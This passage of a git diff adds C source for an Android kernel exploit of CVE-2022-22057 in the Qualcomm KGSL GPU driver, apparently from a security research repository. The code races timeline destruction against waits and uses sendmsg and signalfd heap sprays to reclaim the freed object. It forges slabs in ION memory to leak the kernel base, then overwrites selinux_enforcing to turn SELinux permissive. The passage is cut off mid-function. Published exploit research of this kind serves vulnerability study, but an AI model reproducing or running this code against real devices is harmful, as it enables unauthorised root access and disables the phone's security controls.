sure and redo-it! + migrate_to_cpu(rta->spray_cpu); + + // make it block + while (sendmsg(rta->send_fd, &mhdr, MSG_DONTWAIT) > 0) + ; + if (errno != EAGAIN) + { + perror("[-] sendmsg"); + goto fail; + } + + // use the ancillary data now + iov.iov_len = 16; + mhdr.msg_control = (void*)(rta->realloc_data); // use the ancillary data buffer + mhdr.msg_controllen = rta->object_size; + + g_nb_realloc_thread_ready++; + int batch_num = rta->batch_num; + + while (!g_realloc_now[batch_num]) // spinlock until the big GO! + ; + // the next call should block while "reallocating" + if (sendmsg(rta->send_fd, &mhdr, 0) < 0) + { +// perror("[-] sendmsg"); + goto fail; + } + return NULL; + +fail: +// printf("[-] REALLOC THREAD FAILURE!!!\n"); + return NULL; +} + +int init_reallocation(struct realloc_thread_arg *rta, size_t nb_reallocs) +{ + int thread = 0; + int ret = -1; + + if (init_realloc_data(rta->realloc_data, rta->object_size, rta->level, rta->type)) + { + printf("[-] failed to initialize reallocation data!\n"); + goto fail; + } + printf("[+] reallocation data initialized!\n"); + + printf("[ ] initializing reallocation threads, please wait...\n"); + for (thread = 0; thread < nb_reallocs; ++thread) + { + if (init_unix_sockets(&rta[thread])) + { + printf("[-] failed to init UNIX sockets!\n"); + goto fail; + } + + if ((ret = pthread_create(&rta[thread].tid, NULL, realloc_thread, &rta[thread])) != 0) + { + perror("[-] pthread_create"); + goto fail; + } + } + + while (g_nb_realloc_thread_ready < nb_reallocs) + sched_yield(); + + printf("[+] %lu reallocation threads ready!\n", nb_reallocs); + + return 0; + +fail: + printf("[-] failed to initialize reallocation\n"); + return -1; +} + +void cleanup(struct realloc_thread_arg* rta) { + struct msghdr mhdr; + int size = 0; + while (size >= 0) { + if ((size = recvmsg(rta->recv_fd, &mhdr, MSG_DONTWAIT)) < 0) { + break; + } + } + close(rta->recv_fd); + close(rta->send_fd); +} + +void reset() { + for (int i = 0; i < sizeof(g_realloc_now)/sizeof(size_t); i++) { + g_realloc_now[i] = 0; + } + g_nb_realloc_thread_ready = 0; +} + +void realloc_NOW(int interval) +{ + for (int i = 0; i < sizeof(g_realloc_now)/sizeof(size_t); i++) { + g_realloc_now[i] = 1; + usleep(interval); + } + sched_yield(); // don't run me, run the reallocator threads! + sleep(5); +} + diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.h new file mode 100644 index 0000000..aa2c420 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.h @@ -0,0 +1,32 @@ +#ifndef SENDMSG_SPRAY_H +#define SENDMSG_SPRAY_H +#include +#include +#include +#include + +#define MAX_SENDMSG_BATCH 6 + +struct realloc_thread_arg +{ + pthread_t tid; + int recv_fd; + int send_fd; + struct sockaddr_un addr; + char* realloc_data; + size_t object_size; + int spray_cpu; + int level; + int type; + int batch_num; +}; + +int init_reallocation(struct realloc_thread_arg *rta, size_t nb_reallocs); + +void reset(); + +void realloc_NOW(int); + +void cleanup(struct realloc_thread_arg* rta); + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.c b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.c new file mode 100644 index 0000000..3aaea67 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.c @@ -0,0 +1,69 @@ +#include +#include +#include +#include +#include +#include + +#include "cpu_utils.h" +#include "signalfd_spray.h" + +void spray_signalfd(uint64_t* mask, int num, int cpu, int* fds) { + if (migrate_to_cpu(cpu) == -1) { + return; + } + for (int i = 0; i < num; i++) { + int ret = signalfd(-1, (sigset_t*)mask, 0); + fds[i] = ret; + } +} + +uint64_t read_signalfd_mask(int fd) { + char buffer[100] = {0}; + int size = snprintf(buffer, 100, "/proc/self/fdinfo/%d", fd); + if (size < 0 || size >= 100) err(1, "read_signalfd_mask buffer too small\n"); + FILE* proc_fd = fopen(buffer, "r"); + if (proc_fd == NULL) { + err(1, "fail to open fdinfo\n"); + } + uint64_t x = 0x13371337; + while(fscanf(proc_fd, "%*s\t%lx\n", &x) == 1); + fclose(proc_fd); + return x; +} + +void spray_with_intervals(uint64_t interval, int count, int exclude_cpu_mask, uint64_t* mask, int* fds, int spray_size) { + uint64_t offset = 0; + for (int i = 0; i < count; i++) { + for (int cpu = 0; cpu < CPU_RANGE; cpu++) { + if ((1 << cpu) & exclude_cpu_mask) { + offset += spray_size; + continue; + } + spray_signalfd(mask, spray_size, cpu, fds + offset); + offset += spray_size; + } + usleep(interval); + } +} + +int search_changed_mask(uint64_t expected, int* fds, uint64_t fd_size, uint64_t* new_mask) { + for (int i = 0; i < fd_size; i++) { + if (fds[i] == -1 || fds[i] == 0) continue; + uint64_t this_mask = read_signalfd_mask(fds[i]); + if (this_mask != expected) { + printf("mask %lx %d\n", this_mask, i); + *new_mask = this_mask; + return i; + } + } + return -1; +} + +void change_signalfd_mask(uint64_t* mask, int fd) { + if (fd == -1) err(1, "fd should not be -1\n"); + if (signalfd(fd, (sigset_t*)mask, 0) < 0) { + err(1, "Failed to change mask\n"); + } + +} diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.h new file mode 100644 index 0000000..9caedb8 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.h @@ -0,0 +1,15 @@ +#ifndef SIGNALFD_SPRAY_H +#define SIGNALFD_SPRAY_H + +#define CPU_RANGE 7 + +void spray_signalfd(uint64_t* mask, int num, int cpu, int* fds); + +uint64_t read_signalfd_mask(int fd); + +void spray_with_intervals(uint64_t interval, int count, int exclude_cpu_mask, uint64_t* mask, int* fds, int spray_size); + +int search_changed_mask(uint64_t expected, int* fds, uint64_t fd_size, uint64_t* new_mask); + +void change_signalfd_mask(uint64_t* mask, int fd); +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/timeline_wait.c b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/timeline_wait.c new file mode 100644 index 0000000..72ff49c --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/timeline_wait.c @@ -0,0 +1,799 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "sendmsg_spray.h" +#include "kgsl_ioctl.h" +#include "signalfd_spray.h" +#include "cpu_utils.h" +#include "ion_utils.h" +#include "fake_obj_util.h" +#include "addr_utils.h" +#include "work_queue_utils.h" + +static volatile uint32_t timeline_id = 0; +static volatile uint32_t fd = 0; +static volatile uint32_t g_unlocked_read = 0; +static volatile uint32_t g_destroy_now = 0; +static volatile int pipe_write = 0; +static volatile int g_finished_read = 0; +static volatile int g_close_now = 0; +static volatile int g_signal_now = 0; +static volatile int g_free_spray_cpu = 0; +static volatile long wait_start_sec, wait_start_usec; + +static struct kgsl_timeline_val timelines[1]; + +#define SPRAY_CPU 0 + +#define DESTROY_CPU 1 + +#define POLL_CPU 4 + +#define SECOND_POLL_CPU 5 + +#define OBJECT_SIZE 128 + +#define NB_REALLOC_THREADS 40 + +#define NB_DELAY_THREADS 8 + +#define ENFORCING_OFF 0x32393d4 + +#define WAIT_QUEUE_HEAD_OFF 0x8 + +#define ION_HEAP_ID ION_USER_CONTIG_HEAP_ID + +#define SZ_1M (1024 * 1024) + +#define FAKE_REGION_SIZE (16 * SZ_1M) + +#define SIGFD_MASK ((~(1ul << 8)) & (~(1ul << 18))) + +#define SLAB_SIZE 96 + +#define SPRAY_INTERVAL 7500 + +#define PER_INTERVAL_SPRAY 8 + +#define CHAIN_SIZE (32 * 64) + +#define INTERVAL_COUNT (32) + +#define SIGFD1_SPRAY 16 + +#define BATCH_SIZE 10 + +#define SIGFD_SPRAY_NUM1 (NB_REALLOC_THREADS * SIGFD1_SPRAY) + +#define SIGFD_SPRAY_OVERFLOW 512 + +#define SIGFD_SPRAY_NUM2 (CPU_RANGE * PER_INTERVAL_SPRAY * INTERVAL_COUNT) + +#define SYNC_FILE_NUM 20000 + +#define ION_DMA_SIZE 1024 + +static int sigfds[SIGFD_SPRAY_NUM1 + SIGFD_SPRAY_OVERFLOW] = {-1}; + +static int sigfds2[SIGFD_SPRAY_NUM2] = {-1}; + +static int syncfds[SYNC_FILE_NUM] = {-1}; + +static char g_realloc_data[OBJECT_SIZE] = {0}; + +void* busy_loop(void* arg) { + migrate_to_cpu(DESTROY_CPU); + while (!g_finished_read); + return NULL; +} + +void* keep_spray_cpu_busy(void* arg) { + migrate_to_cpu(SPRAY_CPU); + while (!g_free_spray_cpu); + return NULL; +} + +void* read_pipe(void* arg) { + int buffer[80]; + pthread_t threads[NB_DELAY_THREADS]; + printf("readpipe start\n"); + migrate_to_cpu(DESTROY_CPU); + int fd = *((int*)arg); + read(fd, buffer, sizeof(buffer)); + g_unlocked_read = 1; + close(fd); + printf("readpipe\n"); + for (int i = 0; i < NB_DELAY_THREADS; i++) { + pthread_create(&threads[i], NULL, busy_loop, NULL); + } + while(!g_finished_read); + printf("readpipe finished\n"); + + return NULL; +} + +int create_timeline(int fd, int seqno) { + struct kgsl_timeline_create create_par = {0}; + create_par.seqno = seqno; + if (ioctl(fd, IOCTL_KGSL_TIMELINE_CREATE, &create_par) < 0) { + err(1, "Timeline create failed\n"); + } + return create_par.id; +} + +int timeline_fence_get(int fd, int seqno, int timeline) { + struct kgsl_timeline_fence_get fence_get_par = {0}; + fence_get_par.seqno = seqno; + fence_get_par.timeline = timeline; + if (ioctl(fd, IOCTL_KGSL_TIMELINE_FENCE_GET, &fence_get_par) < 0) { + err(1, "Timeline fence get failed\n"); + } + return fence_get_par.handle; +} + +void sig_func(int sig) +{ + printf("Caught signal: %d\n",sig); +} + +void* timeline_wait(void* arg) { + struct timeval wait_end; + long micros_used, secs_used, timelapsed; + migrate_to_cpu(SPRAY_CPU); + signal(SIGUSR1,sig_func); + printf("timeline_wait start\n"); + struct kgsl_timeline_wait wait_par = {0}; + wait_par.flags = KGSL_TIMELINE_WAIT_ANY; + wait_par.timelines = (uint64_t)(&timelines[0]); + wait_par.timelines_size = 16; + wait_par.count = 1; + wait_par.tv_sec = 0xffffffff; + printf(" wait complete %d\n", ioctl(fd, IOCTL_KGSL_TIMELINE_WAIT, &wait_par)); + usleep(120000); + realloc_NOW(20000); + sleep(20); + g_finished_read = 1; + return NULL; +} + +void* destroy(void* arg) { + struct timeval start, end; + long micros_used, secs_used, timelapsed; + migrate_to_cpu(DESTROY_CPU); + while (!g_destroy_now); + printf("destroy start\n"); + if (ioctl(fd, IOCTL_KGSL_TIMELINE_DESTROY, &timeline_id) < 0) { + err(1, "destroy failed\n"); + } + printf("destroy finished\n"); + return NULL; +} + +void close_unused_fds(int* fds, size_t size, int exclude_index) { + for (int i = 0; i < size; i++) { + if (fds[i] == -1) continue; + if (i != exclude_index) { + close(fds[i]); + fds[i] = -1; + } + } +} + +void check_fence_space(uint64_t zero_region_vaddr, uint64_t region_vaddr, size_t slab_size) { + uint64_t new_mask = (~(region_vaddr)) & SIGFD_MASK; + uint64_t new_region_vaddr = ~new_mask; + if (new_region_vaddr + 128 * slab_size >= zero_region_vaddr) err(1, "Not enough space for slab\n"); +} + +void create_fake_slab(uint8_t* ion_region, int offset, size_t size, uint64_t region_vaddr) { + uint64_t* slab_start = (uint64_t*)(ion_region + offset); + uint64_t bin_size = 128/sizeof(uint64_t); + uint64_t idx = 0; + for (int i = 0; i < size; i++) { + if (i == size - 1) slab_start[idx] = 0; + slab_start[idx] = (region_vaddr + offset + (i + 1) * 128); + idx += bin_size; + } +} + +int spray_ion_buffer(int ion_fd, size_t num, int cpu_id, int* fds, uint64_t* flags) { + struct ion_allocation_data ion_alloc_data = {0}; + ion_alloc_data.len = 0x1000; + ion_alloc_data.heap_id_mask = ION_QSECOM_HEAP_ID; + + for (int i = 0; i < num; i++) { + ion_alloc_data.flags = flags[i]; + migrate_to_cpu(cpu_id); + if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data) < 0) { + return i; + } + fds[i] = ion_alloc_data.fd; + if ((i + 1) % 64 == 0) usleep(1000); + } + return num; +} + +int search_ion_buffer(uint8_t* slab_start, size_t slab_size, unsigned long* flags, int* found_dma, int* found_idx, size_t flag_size) { + uint8_t* curr = slab_start; + int ret = 0; + for (int i = 0; i < slab_size; i++) { + struct ion_buffer* this_buf = (struct ion_buffer*)curr; + for (int flag_idx = 0; flag_idx < flag_size; flag_idx++) { + if (this_buf->flags == flags[flag_idx]) { + found_dma[flag_idx] = 1; + found_idx[i] = 1; + ret++; + break; + } + } + curr+= 128; + } + return ret; +} + +uint64_t get_kernel_base(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t heap_addr, uint64_t* heap_region) { + uint64_t phys_addr = virt_to_phys_lm(heap_addr); + uint64_t offset = phys_addr % 0x1000; + patch_ion_buffer(buffer, table_vaddr, table_region, phys_addr, 0x1000); + uint64_t len = 0x1000; + void* ion_region = mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_SHARED, ion_dma_fd, 0); + if (ion_region == MAP_FAILED) { + err(1, "get_kernel_base map failed"); + } + uint64_t* addr_ptr = (uint64_t*)(ion_region + offset + ION_HEAP_OPS_OBJ_OFF); + *heap_region = (uint64_t)(ion_region + offset); + uint64_t heap_ops_addr = *addr_ptr; + if (heap_ops_addr == 0) { + printf("addr_ptr %p heap_region %p phys_addr %lx\n", addr_ptr, ion_region + offset, phys_addr); + return 0; + } + uint64_t kernel_base = heap_ops_addr - ION_HEAP_OPS_OFF - KERNEL_PHYS_OFF; + printf("heap_ops %lx, kernel base: %lx\n", heap_ops_addr, kernel_base); + return kernel_base; +} + +int set_enforcing(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t kernel_base, uint64_t* enforcing_region) { + uint64_t phys_addr = kernel_base + ENFORCING_OFF; + uint64_t offset = phys_addr % 0x1000; + patch_ion_buffer(buffer, table_vaddr, table_region, phys_addr, 0x1000); + uint64_t len = 0x1000; + void* ion_region = mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_SHARED, ion_dma_fd, 0); + if (ion_region == MAP_FAILED) { + printf("set_enforcing map failed"); + return -1; + } + *enforcing_region = (uint64_t)(ion_region + offset); + uint8_t* enforcing_ptr = (uint8_t*)(ion_region + offset); + enforcing_ptr[0] = 0; + printf("set enforcing to permissive\n"); + char result = '2'; + sleep(1); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + if (result == '0') { + printf("[+] successfully overwritten selinux_enforcing\n"); + } else { + printf("[-] Failed to overwrite selinux_enforcing\n"); + return -1; + } + return 0; +} + +void repair_heap(uint64_t ion_heap, uint64_t ion_heap_vaddr, int* ion_dma_fds, uint64_t* ion_dma_regions, size_t dma_buf_size) { + uint64_t* freelist = (uint64_t*)(ion_heap + ION_HEAP_FREELIST_OFF); + freelist[0] = ion_heap_vaddr + ION_HEAP_FREELIST_OFF; + freelist[1] = ion_heap_vaddr + ION_HEAP_FREELIST_OFF; + uint64_t* wait_queue_head = (uint64_t*)(ion_heap + ION_HEAP_WAITQUEUE_OFF + WAIT_QUEUE_HEAD_OFF); + wait_queue_head[0] = ion_heap_vaddr + ION_HEAP_WAITQUEUE_OFF + WAIT_QUEUE_HEAD_OFF; + wait_queue_head[1] = ion_heap_vaddr + ION_HEAP_WAITQUEUE_OFF + WAIT_QUEUE_HEAD_OFF; + + uint64_t* flags = (uint64_t*)(ion_heap + ION_HEAP_FLAGS_OFF); + flags[0] |= ION_HEAP_FLAG_DEFER_FREE; + printf("freeing ion dma fd\n"); + for (int i = 0; i < dma_buf_size; i++) { + close(ion_dma_fds[i]); + if (ion_dma_regions[i] != 0) { + munmap((void*)page_align(ion_dma_regions[i]), 0x1000); + } + } + freelist[0] = ion_heap_vaddr + ION_HEAP_FREELIST_OFF; + freelist[1] = ion_heap_vaddr + ION_HEAP_FREELIST_OFF; + printf("finished freeing ion dma fd\n"); +} + +int get_ion_dma_fd(int* found_dma, int* ion_dma_fds, int skip, int size) { + struct ion_buffer* ion_buf = NULL; + int remain_skip = skip; + for (int i = 0; i < size; i++) { + if (found_dma[i] != 0) { + if (remain_skip == 0) { + return ion_dma_fds[i]; + } + remain_skip--; + } + } + return -1; +} + +struct ion_buffer* get_ion_buffer(int* found_idx, uint8_t* region_ptr, int skip, int size) { + int remain_skip = skip; + for (int i = 0; i < size; i++) { + if (found_idx[i] != 0) { + if (remain_skip == 0) { + return (struct ion_buffer*)(region_ptr + i * 128); + } + remain_skip--; + } + } + return NULL; +} + +int assign_batch_num(int thread_num) { + int num_per_batch = NB_REALLOC_THREADS/MAX_SENDMSG_BATCH; + int remainder = NB_REALLOC_THREADS % MAX_SENDMSG_BATCH; + int extra_threshold = (num_per_batch + 1) * remainder; + if (thread_num < extra_threshold) { + return thread_num/(num_per_batch + 1); + } + return (thread_num - extra_threshold)/num_per_batch + remainder; +} + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + pthread_t thread1, thread2, thread3; + + int kgsl_fd; + struct realloc_thread_arg rta[NB_REALLOC_THREADS]; + + int exclude_cpu = check_cpu_affinity(); + int poll_cpu = exclude_cpu != POLL_CPU ? POLL_CPU : SECOND_POLL_CPU; + + migrate_to_cpu(3); + + kgsl_fd = open("/dev/kgsl-3d0", 0); + if (kgsl_fd == -1) { + err(1, "cannot open kgsl\n"); + } + fd = kgsl_fd; + + int ion_fd = open("/dev/ion", 0); + if (ion_fd == -1) err(1, "cannot open ion\n"); + + timeline_id = create_timeline(fd, 0); + + struct kgsl_timeline_val val = {0}; + val.timeline = timeline_id; + val.seqno = 10; + timelines[0] = val; + + for (int i = 0; i < SYNC_FILE_NUM; i++) { + syncfds[i] = timeline_fence_get(fd, 10, timeline_id); + } + + for (int i = 0; i < OBJECT_SIZE; i++) { + g_realloc_data[i] = i; + } + + struct dma_fence* fence = (struct dma_fence*)(&(g_realloc_data[0])); + fence->flags = 1; + fence->refcount = 1; + + size_t heap_size = ion_heap_size(ION_HEAP_ID); + if (heap_size < FAKE_REGION_SIZE) err(1, "heap_size smaller than FAKE_REGION_SIZE %lu\n", heap_size); + heap_size = FAKE_REGION_SIZE; + if (heap_size % 0x1000 != 0) err(1, "heap_size not page aligned\n"); + uint8_t* ion_region = (uint8_t*)spray_ion_heap(ION_HEAP_ID, heap_size); + if (ion_region == NULL) err(1, "Out of memory in reserved pool.\n"); + + uint64_t region_vaddr = ion_heap_phys_addr(ION_HEAP_ID) - PHYS_TO_VIRT_OFF; + + region_vaddr += (ion_heap_size(ION_HEAP_ID) - FAKE_REGION_SIZE)/2; + uint64_t fence_off = fill_ion_heap(ion_region, CHAIN_SIZE, heap_size, region_vaddr); + uint64_t fence_kstart = region_vaddr + fence_off; + uint64_t zero_region_vaddr = fence_kstart - ZERO_FILL_SZ; + + printf("region start addr: %lx\n", region_vaddr); + printf("fence kernel addr: %lx %d\n", fence_kstart, ion_region[fence_off + (CHAIN_SIZE - 1)* 128 + 0x8]); + + check_fence_space(zero_region_vaddr, SLAB_SIZE, region_vaddr); + uint64_t new_mask = (~(region_vaddr)) & SIGFD_MASK; + uint64_t region_offset = ~(new_mask) - region_vaddr; + create_fake_slab(ion_region, region_offset, SLAB_SIZE, region_vaddr); + printf("created fake slab at %lx\n", ~new_mask); + + struct kgsl_timeline_fence* tfence = (struct kgsl_timeline_fence*)(&(g_realloc_data[0])); + tfence->node.next = fence_kstart + NODE_OFF; + memset(rta, 0, sizeof(rta)); + for (int i = 0; i < NB_REALLOC_THREADS; i++) { + rta[i].realloc_data = &(g_realloc_data[0]); + rta[i].object_size = OBJECT_SIZE; + rta[i].spray_cpu = SPRAY_CPU; + rta[i].level = (uint32_t)((zero_region_vaddr << 32) >> 32); + rta[i].type = (uint32_t)(zero_region_vaddr >> 32); + rta[i].batch_num = assign_batch_num(i); + } + + uint64_t cb_list = 0; + void* fence_start = ion_region + fence_off; + uint64_t mask2 = 0x4041; + uint64_t per_interval_spray = PER_INTERVAL_SPRAY; + + if (init_reallocation(rta, NB_REALLOC_THREADS)) { + err(1, "[-] failed to initialize reallocation!\n"); + } + + pthread_create(&thread1, NULL, destroy, NULL); + struct sched_param sched_par = {0}; + + if (pthread_setschedparam(thread1, SCHED_IDLE, &sched_par) != 0) { + err(1, "[-] set priority for trigger failed\n"); + } + + int pipe_fd[2]; + pipe(pipe_fd); + + pthread_t rw_tid; + if (pthread_create(&rw_tid, NULL, read_pipe, &(pipe_fd[0])) != 0) { + err(1, "[-] pthread_create read"); + } + pipe_write = pipe_fd[1]; + struct sched_param sched_par2 = {0}; + + if (pthread_setschedparam(rw_tid, SCHED_NORMAL, &sched_par2) != 0) { + err(1, "[-] set priority for rw failed\n"); + } + + pthread_create(&thread2, NULL, timeline_wait, NULL); + sleep(5); + struct timeval wait_start; + char write_char; + write_char = 'a'; + gettimeofday(&wait_start, NULL); + wait_start_sec = wait_start.tv_sec; + wait_start_usec = wait_start.tv_usec; + + g_destroy_now = 1; + usleep(1000); + pthread_kill(thread2, SIGUSR1); + write(pipe_write, &write_char, 1); + migrate_to_cpu(poll_cpu); + while (cb_list == 0) { + cb_list = poll_list_addr(fence_start, CHAIN_SIZE, fence_kstart); + } + spray_with_intervals(SPRAY_INTERVAL, INTERVAL_COUNT, (1 << DESTROY_CPU), &mask2, &(sigfds2[0]), per_interval_spray); + printf("cb_list %lx temp %lx\n", cb_list, cb_list + STACK_OFFSET); + + uint64_t mask1 = 0x52424242; + uint64_t offset = 0; + int spray_size = SIGFD1_SPRAY; + + sleep(1); + int batch_size = BATCH_SIZE; + int batch_num = NB_REALLOC_THREADS/batch_size; + if (NB_REALLOC_THREADS % batch_size) batch_num++; + int index2 = -1; + for (int batch = 0; batch < batch_num; batch++) { + int sprayed = 0; + for (int sprayed_num = 0; sprayed_num < batch_size; sprayed_num++) { + migrate_to_cpu(SPRAY_CPU); + if (sprayed_num + batch * batch_size >= NB_REALLOC_THREADS) break; + cleanup(&(rta[sprayed_num + batch * batch_size])); + sprayed++; + } + spray_signalfd(&mask1, spray_size * sprayed, SPRAY_CPU, &(sigfds[offset])); + offset += spray_size * sprayed; + index2 = search_changed_mask(mask2, &(sigfds2[0]), SIGFD_SPRAY_NUM2, &new_mask); + if (index2 != -1) { + break; + } + } + if (index2 == -1) { + err(1, "Failed to replace sigfds2 mask.\n"); + } + //Fail to replace free'd sendmsg object, try to spray more on other cpu + if (new_mask != mask1) { + int batch_size = SIGFD_SPRAY_OVERFLOW/(CPU_RANGE - 1); + for (int cpu = 0; cpu < CPU_RANGE; cpu++) { + if (cpu == SPRAY_CPU) continue; + spray_signalfd(&mask1, batch_size, cpu, &(sigfds[offset])); + index2 = search_changed_mask(mask2, &(sigfds2[0]), SIGFD_SPRAY_NUM2, &new_mask); + offset += batch_size; + if (new_mask == mask1) { + printf("Replaced sendmsg on cpu %d\n", cpu); + break; + } + } + if (new_mask != mask1) { + err(1, "failed to replace sendmsg object.\n"); + } + } + + int cpu_count = CPU_RANGE; + int cpu_id = (index2 % (cpu_count * per_interval_spray)) / per_interval_spray; + + printf("cpu_id %d\n", cpu_id); + printf("interval number %lu\n", index2/(cpu_count * per_interval_spray)); + uint64_t addr_mask = ~region_vaddr; + change_signalfd_mask(&addr_mask, sigfds2[index2]); + int index1 = search_changed_mask(mask1, &(sigfds[0]), sizeof(sigfds)/sizeof(int), &new_mask); + if (index1 == -1) { + err(1, "failed to replace sigfds mask.\n"); + } + printf("thread number %d %d %d\n", index1/spray_size, index1 % spray_size, sigfds[index1]); + printf("thread batch number %d\n", assign_batch_num(index1/spray_size)); + + printf("new mask %lx %lx\n", new_mask, ~(new_mask)); + + int ion_dma_fds[ION_DMA_SIZE] = {-1}; + uint64_t ion_dma_regions[ION_DMA_SIZE] = {0}; + uint64_t flags[ION_DMA_SIZE]; + int found_dma[ION_DMA_SIZE] = {0}; + int found_idx[SLAB_SIZE] = {0}; + int off = 0; + printf("region_offset %lx\n", region_offset); + uint8_t* region_ptr = (uint8_t*)(ion_region + region_offset); + for (int i = 0; i < ION_DMA_SIZE; i++) { + flags[i] = 0x4141 + i; + } + sleep(1); + migrate_to_cpu(cpu_id); + close(sigfds2[index2]); + change_signalfd_mask(&addr_mask, sigfds[index1]); + + int found = 0; + int spray_num = spray_ion_buffer(ion_fd, ION_DMA_SIZE, cpu_id, &(ion_dma_fds[0]), &(flags[0])); + printf("sprayed %d ion buffer\n", spray_num); + printf("start searching for buffer\n"); + found = search_ion_buffer(region_ptr, SLAB_SIZE, &(flags[0]), &(found_dma[0]), &(found_idx[0]), ION_DMA_SIZE); + if (found != 0) { + printf("Found %d ion regions\n", found); + } + + //Try other cpu + if (found == 0) { + for (int cpu = 0; cpu < CPU_RANGE; cpu++) { + if (cpu == cpu_id) continue; + spray_num = spray_ion_buffer(ion_fd, ION_DMA_SIZE, cpu_id, &(ion_dma_fds[0]), &(flags[0])); + printf("Retry start searching for buffer on cpu %d\n", cpu); + found = search_ion_buffer(region_ptr, SLAB_SIZE, &(flags[0]), &(found_dma[0]), &(found_idx[0]), ION_DMA_SIZE); + if (found != 0) { + printf("Found %d ion regions on cpu %d\n", found, cpu); + break; + } + } + } + + if (found == 0) { + addr_mask = 0; + change_signalfd_mask(&addr_mask, sigfds[index1]); + err(1, "Failed to find ion buffer\n"); + } + + uint64_t table_vaddr = region_vaddr + region_offset + SLAB_SIZE * 128; + uint8_t* table_region = (uint8_t*)(region_ptr + SLAB_SIZE * 128); + uint64_t ion_heap = 0; + uint64_t enforcing_region = 0; + + int ion_dma_fd = get_ion_dma_fd(&(found_dma[0]), &(ion_dma_fds[0]), 0, ION_DMA_SIZE); + struct ion_buffer* ion_buf = get_ion_buffer(&(found_idx[0]), region_ptr, 0, SLAB_SIZE); + uint64_t ion_heap_vaddr = (uint64_t)(ion_buf->heap); + + uint64_t kernel_base = 0; + int skip = 0; + for (int i = 0; i < 3; i++) { + kernel_base = get_kernel_base(ion_dma_fd, ion_buf, table_vaddr, table_region, (uint64_t)(ion_buf->heap), &ion_heap); + if (kernel_base) break; + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + sleep(1); + ion_dma_fd = get_ion_dma_fd(&(found_dma[0]), &(ion_dma_fds[0]), skip, ION_DMA_SIZE); + if (ion_dma_fd == -1) break; + ion_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + } + if (!kernel_base) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to get kernel base\n"); + } + + skip++; + ion_dma_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (ion_dma_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to ion_dma_fd for enforcing\n"); + } + ion_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + + int enforced = 0; + for (int i = 0; i < 3; i++) { + enforced = set_enforcing(ion_dma_fd, ion_buf, table_vaddr, table_region, kernel_base, &enforcing_region); + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + if (enforced == 0) break; + munmap((void*)page_align(enforcing_region), 0x1000); + ion_dma_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (ion_dma_fd == -1) break; + ion_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + } + if (enforced == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to set enforcing\n"); + } + + ion_dma_regions[0] = enforcing_region; + uint64_t kernel_shift = kernel_base - KERNEL_PBASE; + uint64_t wq_ptr_addr = KGSL_MEMQUEUE_OFF + KERNEL_VBASE + kernel_shift; + + int wq_ptr_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (wq_ptr_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for wq_ptr_fd\n"); + } + struct ion_buffer* wq_ptr_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + + uint64_t wq_addr = 0; + for (int i = 0; i < 3; i++) { + wq_addr = get_wq_addr(wq_ptr_fd, wq_ptr_buf, table_vaddr, table_region, wq_ptr_addr); + if (wq_addr != 0) { + break; + } + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + wq_ptr_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (wq_ptr_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for wq_ptr_fd\n"); + } + wq_ptr_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + } + + if (wq_addr == 0) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for wq_ptr_fd\n"); + } + + int wq_fd = get_ion_dma_fd(&(found_dma[0]), 